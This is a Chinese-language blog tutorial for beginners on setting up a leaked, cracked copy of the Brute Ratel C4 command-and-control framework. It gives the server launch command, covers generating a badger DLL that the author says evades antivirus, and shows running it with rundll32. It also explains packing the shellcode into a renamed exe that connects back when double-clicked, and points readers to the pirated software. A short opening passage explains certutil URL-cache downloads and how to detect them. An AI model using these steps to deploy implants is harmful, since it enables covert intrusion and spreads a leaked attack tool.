BruteRatel_1.2.2初级入门教程,新手必看

admin 2022年9月21日23:56:30安全工具评论129 views2157字阅读7分11秒阅读模式

BRC4 后渗透工具集是由Chetan Nayak(Mandiant和Crowdstrike的前红队成员)开发的攻击模拟和后利用工具包,于2020年发布。后利用工具包是一个可定制的命令和控制框架,为用户提供诸如(但不限于):将shellcode注入进程、执行脚本执行和编写C2通道(如Slack、Microsoft团队)。

许多红队和对手在取得立足点后首先执行的技术动作之一是下载其他工具。许多现代安全工具能够使用无头浏览器(headless browser)之类的工具轻松检测到攻击者但是,蓝队有时可能会被忽视的一种攻击方法是利用系统上已经存在的现有二进制文件(LOLBins)。该方法最流行工具之一是certutil,它是Windows操作系统上的命令行程序,用作证书服务的一部分。它可用于配置证书服务、验证证书以及更多与证书相关的活动。CertUtil中的一个命令参数——urlcache,可用于执行URL缓存管理操作——攻击者已经意识到他们可以使用该工具来下载恶意文件,但是如何检测呢?

检测恶意certutil活动的一种简单方法是通过CertUtil.exe的“urlcache”参数查找正在启动下载的文件。CertUtil通常不用于从Web下载可执行文件或文件,因此当它从互联网下载文件时应被视为可疑活动。

2022年9月20日,BruteRatel_1.2.2.Scandinavian_Defense_Lic_20230101破解版泄露。

Kali 下运行文件

BruteRatel_1.2.2初级入门教程,新手必看

首先,第一步,先给文件执行权限,为了省事,我直接给777

sudo chmod 777 -R ./*

BruteRatel_1.2.2初级入门教程,新手必看

第二步,安全起见,也为了运行稳妥,先使用官方脚本执行安装必要组件和生成证书

genssl.shinstall.sh

BruteRatel_1.2.2初级入门教程,新手必看

sudo apt-get install libqt5webenginewidgets5 libqt5websockets5
## server dependenciessudo apt-get install nasm mingw-w64

第三步,运行服务端

./brute-ratel-linx64 -ratel -a admin -p [email protected] -h 172.16.208.131:8443 -sc cert.pem -sk key.pem

BruteRatel_1.2.2初级入门教程,新手必看

第四步,运行客户端

BruteRatel_1.2.2初级入门教程,新手必看


BruteRatel_1.2.2初级入门教程,新手必看


监听


BruteRatel_1.2.2初级入门教程,新手必看


BruteRatel_1.2.2初级入门教程,新手必看


BruteRatel_1.2.2初级入门教程,新手必看


生成 dll 文件


BruteRatel_1.2.2初级入门教程,新手必看


BruteRatel_1.2.2初级入门教程,新手必看


https://www.virustotal.com/gui/file-analysis/MTk1OGY4OTM0NTNmMTcxOWUwZWUyMjAwZGQ5NjVmZGE6MTY2MzY3OTkzOQ==

默认配置下,dll 免杀效果不错!

BruteRatel_1.2.2初级入门教程,新手必看


运行文件

rundll32 badger_x64.dll,main

BruteRatel_1.2.2初级入门教程,新手必看

BruteRatel_1.2.2初级入门教程,新手必看

先来个取消延时

sleep 0

BruteRatel_1.2.2初级入门教程,新手必看

获取操作系统的用户

run net user

BruteRatel_1.2.2初级入门教程,新手必看


---


1.2.2 版本目前看无法直接生成 normal exe,可以通过生成 bin 文件然后编译成 exe


BruteRatel_1.2.2初级入门教程,新手必看


BruteRatel_1.2.2初级入门教程,新手必看


借助ShellcodeLoader进行编译 exe

https://github.com/knownsec/shellcodeloader
https://github.com/knownsec/shellcodeloader/releases/download/v1.1/shellcodeLoader.7z

BruteRatel_1.2.2初级入门教程,新手必看

BruteRatel_1.2.2初级入门教程,新手必看

BruteRatel_1.2.2初级入门教程,新手必看

BruteRatel_1.2.2初级入门教程,新手必看

生成 loader.exe 可以任意改名,双击即可上线。

BruteRatel_1.2.2初级入门教程,新手必看


本文只是入门操作,其余操作需要自行挖掘。

软件下载地址在群文件,需要自取!

BruteRatel_1.2.2初级入门教程,新手必看
BruteRatel_1.2.2初级入门教程,新手必看

广

CISPPTE

CISPITIT

CISP

1

2

4

1

NISPCISPCISP


+CISP

CISACISSPCISM

 CISSPCISP

 CISP-PTE

 CISSPISO27001

CCSK

 Security++

BruteRatel_1.2.2初级入门教程,新手必看
BruteRatel_1.2.2初级入门教程,新手必看


原文始发于微信公众号(利刃信安):BruteRatel_1.2.2初级入门教程,新手必看

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月21日23:56:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  BruteRatel_1.2.2初级入门教程,新手必看 http://cn-sec.com/archives/1308909.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: